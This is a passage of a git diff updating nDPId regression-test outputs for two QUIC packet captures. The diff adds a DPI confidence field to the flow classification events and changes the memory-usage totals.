 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600859 bytes
-~~ total memory freed........: 4600859 bytes
-~~ total allocations/frees...: 99585/99585
+~~ total memory allocated....: 4685812 bytes
+~~ total memory freed........: 4685812 bytes
+~~ total allocations/frees...: 101175/101175
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
 ~~ json string max len.......: 2199 chars
diff --git a/test/results/quic-24.pcap.out b/test/results/quic-24.pcap.out
index ef53abeda..856749af2 100644
--- a/test/results/quic-24.pcap.out
+++ b/test/results/quic-24.pcap.out
@@ -1,10 +1,10 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-24.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574209133040,"flow_last_seen":1574209133040,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1574209133040,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02123{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574209133040,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1574209133040,"pkt":"ClnTQ78Jzivom94WCABFAAUA04pAAEARTk4KCQABCgkAAqHcAbsE7BkSw\/8AABgSKZqySaf1jUZ9aFypIIlM688aEfXDUlabjvj32ExHj28K\/LzWAES33jM5bR+MtpU1BLUazwIKZfi2UUsjupyQtwh0cwaTGSNsc3ziOvMvl5HeN7dnqFzrpWV5xSzaGXCCKPfdH3vP8j3J6ZLIzElZQZR3emJo528x+jgZIHOdaSnx3DWXxF2zh+YTIF4T7iX6QufVjaqbZGcqLfU2h5UhvDV4FwyX3uhlDNyKeZHYtgm98LQqq4\/RRT1KTyGKWwsLmYKiT2RZhGfdnj7cabAAzsX7Lk2p9chyJNCYC2rvLfiUJPAyxycnjNSX2Lj6Aqa8nfo2RgXdwfCaQgxab+TGB6bvb9v+EsUoxuSJh+r\/RN\/6YKeOx43w+asFLV8uu4y7ez42UTvh8WhWB9gu2sFvRZZAH2gXrPZjvaMUKjvUztSfZobDePj\/3bGH7ParnvadIlRAYU9Q2+DurqTinGpGLj1JdKLQoxeMx5eGSPtbuqNyirKapdyXJ8ZKCVjdL9m2B38WlanD9I0yGpWtoLvsOi8f8x\/fhHjJnp\/JSreuYABX7IvE9OH17Ka\/DYXSP3horLga3cmeawXPCcyfSVzp0vy3ZIaVNlu8tvkbFVJwffn9HIFK6HKNWjCpRF+ahuWdOTEeIZZ7i7JR8vw5bYFyaufxilZin8M6RIaJMeMrQc4vvfUfbDjsZuuyfMbD+CtkYjt3ODwFx3+9dnCnls3bcnN\/LK\/fVogu1W6dC2V8OgzkkQDp+glgaZFK3x1y9W9tAnAfcG86bUqaAVXac16E+jbjt3xUVxE3wSFwqpaXR87jZ7puVI7a++RK4x\/CPU7cBx4HxakipMRXAW7+Zzm5Uylji8R1ndMJge591UykzR\/a1rIFwcUFafwyzFwutVakAK\/iM4YhBMTpFZmHTyv44rZt\/SzvRW3ChO61o38I1VeCK0g8ZFXOiuIW\/pELm4Rr3xBh76iDlvWF6YcC0+i92ff1n2MDPlwUBp2JPBEhF9KRkoluOW0vEGZjgOTNF0WO0oSPjp6cRmPu7QFACVxUUAGGJ52pSjmae6FO4iTNFAYtrcv+HXjZLY56ae9mCQOyLL1m06CQPGFQiHOPr2CJqh4awJXrhUafIQCu5ugPi3shAySSxxSNpoi1XFyoXHmAfehBuKAMDEBi\/K2+sO4vF3gp9aph5gyVGEs0pc0rnIKidNla3xHEAlRzhJVd750Uscx9utTZFhNIJHFYbXnWol4tLG+jZZli4l18thfxYBatUVfQbpNdD\/lD+eYzZtOp7YtW1ZKF+ROaDrWxEjfCdVtcjK18Uyjgz5TeZuG7pFJ5t3qyXb+n\/5MzCAN9XPJPpQiYdvqPfvMUwezKWPFBlXc3KAr8TrBHXbzxwj68KugT8kPF6Hf1ZknvffVMbgWpKERCnzNCkdVDHz0qsfdTxN1E8gHLdnzTTb4wYHbDra2Qy1AzeGTZ5VuCqGVCxMyMSucpv1SUY2NRHw7nEKVm2pvwZDPcCeEad3kICbdC4XAMVUx0Mf\/rJlO1G38DhZUFTtkiOIXY+C24n5VM7VxZQ+dzu2YG1ROOR1dGwLm4sR7mTJIH6rldcwpGAOA19nihJl7wI7sV3QgaIXVtqDL9j\/YH7Q44xODtLK6dfnLZ9llZp8VromtwQj2StAFDoQ=="}
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574209133040,"flow_last_seen":1574209133040,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1574209133040,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-24","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574209133040,"flow_last_seen":1574209133040,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1574209133040,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-24","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}}
 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574209133041,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":177,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":177,"pkt_l4_len":143,"ts_msec":1574209133041,"pkt":"zivom94WClnTQ78JCABFAACjQSNAAEAR5RIKCQACCgkAAQG7odwAjxS18P8AABgR9cNSVpuO+PfYTEePbwr8vNYSuDzEUSnLqX7jSNZH88cG3IWnEimaskmn9Y1GfWhcqSCJTOvPGgt6q75e4Qn+zUFJSyFY0SIiHRpQLjIDBESVGuKc8OTad8PhKZ1BA74OASFH4nOmQVGBciF1MYu4zBXJkM1rI\/zCp6CTKJAyA9IF"}
 02127{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574209133041,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1574209133041,"pkt":"ClnTQ78Jzivom94WCABFAAUA04tAAEARTk0KCQABCgkAAqHcAbsE7BkSzv8AABgSuDzEUSnLqX7jSNZH88cG3IWnEfXDUlabjvj32ExHj28K\/LzWQEoLequ+XuEJ\/s1BSUshWNEiIh0aUC4yAwRElRrinPDk2nfD4SmdQQO+DgEhR+JzpkFRgXIhdTGLuMwVyZDNayP8wqegkyiQMgPSBURs4UrqJXSOmdlzOQkT83Thm0cw7nGhY1Dqr9WBER804ydL76SsuNgGBxQl7a0HOKMMpAXLx8NIbh0fGKNE2byFJvnpcszX0hTK6rJr5u2g5MPDhCWVAqZWA\/ogTmUNM\/hiTPfQkeihINkuu2xiOaqPKq8sMuQjF678ZOS3GHn+0TKDo1\/YbLwJy\/ZpXJGxt30cfRSaAH1ZjGC\/le3BtTf6Ee25IG79XjyhHYyykWI2qhKWR0WZIipTrVnQ8OQ9VFey3MfNakIGaPPsyV69yfAmkmASAVXFu7Mo6y0Wz\/k+XakzO7FNz+SVS8r\/HampTgbi4jZsv70uNhIa7mA4qtW67mQ4Rtz5mrDrLhqz2cchVuQJJMooj0k2Xmg5SrVAA8L+yguIaKrDD971nuLq358VPAy8fRB724dILFO0lMVCte\/by\/Z5smTmpZsXjBALsYbcl4FVVEwEstKsA+gV11h+TKoi0PysZzUv4Co6O8\/IBnHMvA3aNldZ6T2\/ehbVZg8kV+TWp68hUC2ZNn0WR\/hIHa\/ud6KCIM2HuunHoyDST3M99tIIw9T05lx57290aLBbTURhE0FEw+sGowcXu3C80nVKiDimHMp1c6mqiWhDKZbGOAdpIWwpYqyGb1wbm5oAoXEAR7Mc+jjR0J8zJlFvt86aEVTtTJma3fejOJ3C6CfSBtcEM9aVUQVmL1wf7Fi6TTqbbFA9hnROhk7vqewbhtVmirjNaHoW3nHcl5Ky2MEXCHIhVYecuDZG8tKTrUF\/HFpCaGl9ktkqkasn0g56PGXthtx8q15PYDSjv9yWDxzwqk6QO6Yvxw5QtpcdW836IfXVH9twCWk7tokUrBa+jkGq4sxymyp8HJzlBaLvbaRQuaENeIm3CsGj3g9j2MS5rx5x6bLrNsqG7vyWFoKKK6rqr6vFuCF2irBVzzRdUFclg1SSHgOpaIic+xLUKXq+lZZKiY1RKji5vWjtQKTKYEV029kaxm787YffQ8yTZZB6Hh6BkDWEPJYKpvcHrYxyRBFLQRGWx4ITq5kdTA0MWD1a5s3\/Tz1ghAL0hkcPsti\/Um+kiW+XSNOONWqykERpHTJUdF9XR9VjidFyK82bmGKcNXGpEf6KxiEWWOfrwygEpxaXYc1XPpi+3jqe95\/5QRYGsINOcrD5IkF6QniULDRMMwwkr\/ECjICIiZDSB0yvurV+rIeACZwQwc9BCfZ20PoMtA9Sb0+HvwlI89lLwU1WoQ\/uQFCU2G+iaFma79WKu7nfdJy0UCSpgYk\/WwxenGfaRqde0duIKqJ4VQR7DQ\/1P+Fdg7iOLJglPQ16bgg\/VS+HMi5ElBV9H43KK0X9+d\/wx6yTnUwB9LBosIDE739HoREBuU9qFyhmlmKq9iiXdK9S72zzDVpgLdZ5NTJCzLKyehhNiJq3WHWlmpoiXXclIQS2qvLhF3s8CmoQTCIFD2YwbMLNLc3NR5kX4hROEBrWwC9+79LiHN5YezdiHlgZ3UHXQ0QcCITAtA=="}
-00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1574209133040,"flow_last_seen":1574209163081,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":7370,"flow_avg_l4_payload_len":491,"midstream":0,"ts_msec":1574209163081,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1574209133040,"flow_last_seen":1574209163081,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":7370,"flow_avg_l4_payload_len":491,"midstream":0,"ts_msec":1574209163081,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"quic-24.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 15/15
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600686 bytes
-~~ total memory freed........: 4600686 bytes
-~~ total allocations/frees...: 99580/99580
+~~ total memory allocated....: 4685639 bytes
+~~ total memory freed........: 4685639 bytes
+~~ total allocations/frees...: 101170/101170
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
 ~~ json string max len.......: 2132 chars
diff --git a/test/results/quic-27.pcap.out b/test/results/quic-27.pcap.out
index 8583fd66e..98722b2d2 100644
--- a/test/results/quic-27.pcap.out
+++ b/test/results/quic-27.pcap.out
@@ -1,10 +1,10 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-27.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388075915,"flow_last_seen":1592388075915,"flow_idle_time":180000,"flow_min_l4_payload_len":1330,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":1330,"midstream":0,"ts_msec":1592388075915,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388075915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1392,"pkt_l4_len":1338,"ts_msec":1592388075915,"pkt":"AAAAAAAAAAgA1Oceht1gB9AaBToRPz70IZT0pjUDQM0HFABXxOQvPWTRnVlUmwAAAAAAACAO+uUBuwU6BFLF\/wAAGwh7p3UKjzv1VgAARSBBNb8rxExjuvv1Ye++hbc9om0DU4NnwSG\/3UebQzKe+\/ChMR6f65IjHiAPoLAAXROmLqaJFJBg9Sjii5GNpIY1s7jLmFqalAiGP2eQLOW5rgxDWycwtAoSDO71eI9T1Uq7EBmGHvnPmeSBFCTAwbphrP9uMLPyAc17USwCikZDlt2XGVMfiXze2ila5iBclIpM\/nqIjbZDUUYzdC34yYbr54VrUe33DQppusK5QzTfqS+3bRJeNmvfVjhputwGoNup+0y7rJDCwpxgcjG0dCKgMjLHOmSc3TOXpHySWsU8YrZhzLttd3CTZRM5WZ+WibgEID8\/Y94\/jmGwbweD3Pfo3Ppwfbm6t+wCItY8yBKRQ+H5v5jedjzP\/LjrRtljajhGcJZd6HJgjueiAiaEAdj7fx0T9yjCxPVImLtLHfXPo558xAwXVU83pzT9xavzftzVp99vYm\/GU\/kg1VYfnH4H1qpMlTlic\/Q6Q8iLnCNGJ9LIhtmYFfunAmiyObADRsU4B6j4HoJX3if+mucsKdp+8N3ugLjM4uwUvOF7XyACDpCZ\/G3\/5X5J\/zKZkqDPUYvuluMsSOj8B9WlMWtbGerp5EjqolIlNnjYomDTKeHIxZZRBaJp\/QOHxqWVWl+MlH9KWaLg+UuJ1tkD\/z7oSb+H1aPInCB0q4IOfY52jC5M0sAyNUCCRYRJtlGM\/qM0P8wM\/vcpX4GIrlML77jxP6dU5SrTUTaXASv8j9337neVie5dGU901jPeI0ibTEPO5jmp5JTAiUrtWT\/OPLGl6+AqDrvj2iLYI6MfHf54Ll0eSJwKxczdOyajjbkW+wF4mDNBcrHs+Iy+NLs84KPkQaEHysgP5fydEh4OpzytKTjbeDrjBTG9KcUWYmBar2q8HpPFclPVfMJzlgzmG1ymiPOmBJDgqQ3ZUM2g855ht6g7tzCMio0LrDHG0qDTQGyGwGnOACHMF4aRlNBHHPXjD0AWFg5ITC\/muG1btVnHCRMRKjcJbcwgB5knd4j3yLyF5jIDRSKNhE6Ac48oXpl\/X8QX7id\/RdTdMTE+I9ImLp3efowsLaCMtmIEe+7JeD8HXS\/DHY7CcQC7QJJxTExlt1pZ1J8VxZQ\/Rin8crO7sCUZAX\/MAmOTczrCmlYKxmfZCym\/VBLaEls1IO\/vlhGhIazJ4ec+unaATLsbpA8gpl3A6fA\/mtphj6B2kmQmdb4PDBkjLGlUB9TA\/hWCdu8okA42ElpefKLs7iaYvj9eGjbpH4CtZIsn81hYHam0KixsLnFD01WT2G3jWF4\/p32XASEAIX2fGqhIl42kT79V0gWU\/zHFYX4d1dqE0R0QvDLgaBR5adJ\/AQSCQX30uHxQBsrPiDAUle40F0f\/CKLbXDtfvQg3i0EyI3KXCW22kEkJyctCWU066Vqsp6MiM5DPCQw20QD2L38WJTrzFxYD7gmCe1AwoQFfD6gqTnrS3Tj0ht5GTD8vsEYZ0oezjMP8XuBMCjClE8hToMxgRyaUKQoJ4zuAen+tMutEa2m48+u5jHJEJljGjHC4LHZWMR3906vXde+zdCg1ShHY11L\/Bz5vKrplIBCiT9vl3ZYNjO6hBlbKS8VP\/yg6gsLQ9AigFTHxstN+VusbiYbo8JJgQWEcDGy2dI9GZZqPmAAFQeJAEQIBnrb965lc\/aHxPwoSZtBKWldoAMiE22ownQezP3boCQ596Xlhlq\/aTLkj8uddR096XdeUuOzAUI7eEPdA9iCr"}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388075915,"flow_last_seen":1592388075915,"flow_idle_time":180000,"flow_min_l4_payload_len":1330,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":1330,"midstream":0,"ts_msec":1592388075915,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"beta Chrome\/84.0.4147.45 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}}
+00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388075915,"flow_last_seen":1592388075915,"flow_idle_time":180000,"flow_min_l4_payload_len":1330,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":1330,"midstream":0,"ts_msec":1592388075915,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"beta Chrome\/84.0.4147.45 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}}
 02264{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388075921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1392,"pkt_l4_len":1338,"ts_msec":1592388075921,"pkt":"AAAAAAAAAAIA6W2Tht1gAAAABToROC89ZNGdWVSbAAAAAAAAIA4+9CGU9KY1A0DNBxQAV8TkAbv65QU6\/nTM\/wAAGwAIe6d1Co879VYARSBTj79W6cwNvYIa4eRJRqYVEF\/FFQs4\/YFJNsPxXKvEgdRDTO3utbDdVpsr9xE5Fa\/TpG177HOYaSrCAz5Jo2+BV5oFjmMd9bTEkWInl1UOdHKW2niDF5nMaLe02aYd0mp25Hmgx4h+P4ZNUU2g7lMQwO8oh5pyFwebO4ynZaVfKfuvlderCYi9W3A+nCI5swIBOg\/\/GR\/eRpRy+l1xUDMEIkXKJ9xm\/36tgV9mPj+QnGLik9ENPu+ZN+Me0EJ5sHt5U9N9HC21bIxbx2522Px9RzM8EV5k0bNaVeSUX6Kx86PSOGKlOzKToSyBuVcP\/8Y\/pj31FFMn4jXKSKIZkR4jdHKqC8A0U8JWz+lo5qygK0a0s0j3vnz5UfxKqxBqYcCTRyIv0ihPq9lNS2XBnJHxjyGSIIPIjQ8xsASU2vSfjgEk5w8+ci+un+2IlNQ9pkFNXyipoW9wTbokYSnOTxLk6sFfH3dsyfqGWWE1tcdt7fy7oyiEsvZGRhn\/L+h2S5jSKsdHx7NdNgIdO39fvhXOA8HjSqb3VALAtyj6ehundx3BZcRNfsuUa5ZwC219uau0CpTuX2Tcg4sLjnvZG2Lvryln9pXYVKexJ7M82YgjmrH3wKorHuQt5fR9o7MWyn4djeqsrjK1KyRTCzgfjFDh3HyEU84LAmn6y\/vAo6GV5tlhx7mhZNMKhoPxPwLQjI9LlPc\/eMbJSDiPSdtQN0Aka6OS5JgFtfkS4GGEZrqH3Wmy218ogEMrR323mHZfknuU+di+qZFkdH\/EQiWObuHXwvxT+d8mUKnyAB02BTcx6ikllxkk+7Anulz\/alZEZCKgpjN62uDEL1zgUQWaEwOMai6Bq8aLpyIjWmfI3mXlEoQL9YGtvFU3NA0ZJr0FsSmnF79XixoAiidGmVLveJwbz2v70EltiOw6GW4XT1Nx8GJbOHEb4lw8Nf+y1YmbiOSl6N6MqAV+LTudvCC93HluIlhU0E3uX9LGDS+ScDF\/SXTW4zk9DPu\/I2vtwGCJX81Rv1WV8uy3YU63ClpeYXvX7h3rAbpodg\/tjIJpSxX8PbWv2L+X7I9n9ASbVRLPybgw1VXro90q6rMYVQ\/J4rPmhLpWzdEAazqGLHFi9KCGNiyg\/RvVoTwUKLYJ2wN2A7fA5TkKjD7w9oSn095bN7P+h75McGVrIyVqdEh4yuOB+Tvz9c62lXezMJJBw0zLwBGL\/8fc+U1+0HGaZ8c8r\/a9gzaAu\/1hL\/GX6BDxGvNlvCbNJSR7uYc+tLK+p8LJwdEE6O1NRlrVaqPbBG+gZN39wLrBIi\/4C1PvaV8uwXWpwJT4\/2iKYJmYuzWYHqOYb26qPVfaWtKa8zR+ytS6h93OrCLmPemuHc\/JEUEpO0dp8igHMSUL1C+oRr6S3mhQFj3DoLOC25YV2Nz23shcZvt4jUGqP33atbdN9fs6Z6FU668dqDsydPhc\/SLsWEHLNI2dYaUpYVsKq4rnVyNmOwE\/6yXFioayjL1rahnUdwSUA+95p6JoySDTBjZ0UNSLSl7C2+U5OFwI7ckGRhoW0KKahovJhm17+fTYxdp+9HuvzWSSUY0fZvLQBV7yxLsR4PcQVPaqkZsrRSNzLBu5zsWgsJ7iTP5Pui\/izmglDfXm4vEH6laDbuG6URrQ7dv3yhcwEz\/QEq4E36vx+7mzPgws4U6N6vHcQkT\/3gkAaI1tEvZMgcRaUphUC3VFG3nl7XwQxFcW31F+TgbWi2aESvVU"}
 02260{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388075957,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1392,"pkt_l4_len":1338,"ts_msec":1592388075957,"pkt":"AAAAAAAAAAgA1Oceht1gB9AaBToRPz70IZT0pjUDQM0HFABXxOQvPWTRnVlUmwAAAAAAACAO+uUBuwU6q+fA\/wAAGwh7p3UKjzv1VgAARSD7U2hL0O88k3UZXjUbrBBd+WZB0UG\/j7758xlBZzizfYUS+JxzLcKYGo8WQzFU7GyiuzvE8f9eov2KYsEVwanC7Vc9pLDljUq9fi2hrf+FzyyRcUlliaDQXxX7n1Ivm9KRXOqnnKdmfHVEvBFAffLmUIXWbO+YgkFjGfD8GnPXDCrAqvwlSSmWge5izab1xOS9Wo1XnWifp0lpGLQpE1MqqxNhBIDxbfaVbjuMEAWyrxRLEqh16GZ0\/jsodxxqlZew4w347xtEtqPzlLyHr4poFBV0Y0YYyCJ1yuoIhaXm+33Z+1T2cYWE7O6I9WEk+mBcGSHxZEZP4CaDr0T3d2jgKsNoKY7bkKT1W4j+vuMJDFuHBaV9SRkGAElCQfGPawy8Ys82dsHnmEEyzp8V6ce7FzsZZVA9JPutVgoejftdzH\/RLPkp8RBEvUi+HMOKcmfLfnWgmtZUoG2P5WRsd4keUAJzFzPu8JDFkn8Qz7I2ryzN2cOlRhia\/jz4PgIUt+4ZQKXncNfyTzS2OteWVaV9zMESXfyvD0pVAT08qEHRc6laTl0ufuUQBtHn5CKjoJYFHspiVeCiJegPMoj4HilpDrhpSZdELNW8O6lX\/+Ya\/E5+xP\/XiQg9mVqUhmMopCMRpiLIe2Y5jGt3vKxJGa5gox\/Ao+2MtfZQZSIoFcP8KluOAfCrb5sGinc+sTc+ZKeAOQmz2FRpTh4fxO1mAo2o9ZJLguqcLrOlyxUUSOHnuLgNLS7XObH1LUUip1vPpeYTmlqzrANNh9EYL2PlIErptyjoZYKQJ8rGcKFCKO11+88Wp\/LRi79APRPkY6RnAKucyRnsrN5ZraDdPgKee842vxIdbP4CvpQKByezNr0Y4u9e5janU208elx\/zNNPzGR9+gsEJIstRXxFey8H0re4AXkIgXjqAReUAEftPwSWT1yW9+jva9RQbrdrR5MlklIvCCr\/7U5+3OUw9\/43s\/O3pgzG2DXT5bg3D27JwIW8euuy95GFovl\/nwOfDJmNLw18bQ3hbUqIFcvmzSmF4CVgS8f8nD5zXQn0Y6t6H\/0dRw6m\/fNV\/hHkJp2gXqQ7165w9HG2aJNS+9mCFSeYNr4H2pXUCnIsj\/Pby8rM4BOGLZX6zg3e6S5gFfYBAXTKRGfLDh+HC8x9D89XnWP0cyQWheKUU2YWacOr4WVE0zJK4qj2v39Y03nQgSY7Oa54R2PRMjuzzTSkaITdQ1fo\/eapkrPXa1eGFgwwF6EMe47fkokLHjscKhQ9hUwVD1WZo132hEoWEgCk6GBm9kpFczYiEdZUPhpULGvCKI1iCSBgMjY4vkSPjkj\/CUDk9lkmQxFPWmRRIn5bNqB\/16pGMD5AZgW1l2kOJo5CYfNF1x84eGg+l3fSTIrHWDb7BvF8kmCbEpzK5xtWGHGjxOpk\/7a+pTOyHHSCngxZDzPdni8BcsxtcevFPBg2cOlxb2H\/0wK6HxkRNoGyDH5CwTV\/9XVHoipCcVdCRMqh2JweXzA8wyDxryIMQur2tx3A0CW64wtn\/h7BSyKnDTRXR1V+Wa7DymTTmnRiQ6l5f3ecwcceih\/JZP\/GSUvQLB1MZBKOprH4Whg11Rc2g4AjShZ7+YxYeeQtOgNFCRS53FA6JbVYqDpNySia3zORBhbds4Rqs3FtKCEuzx1fAYtgyzWdf8adqeSwRKSlOPPdqsVh5zsBNqK4beqT9\/RPVDkfR2bjUTRJesgqyVO6iWDbnnnAdtd3"}
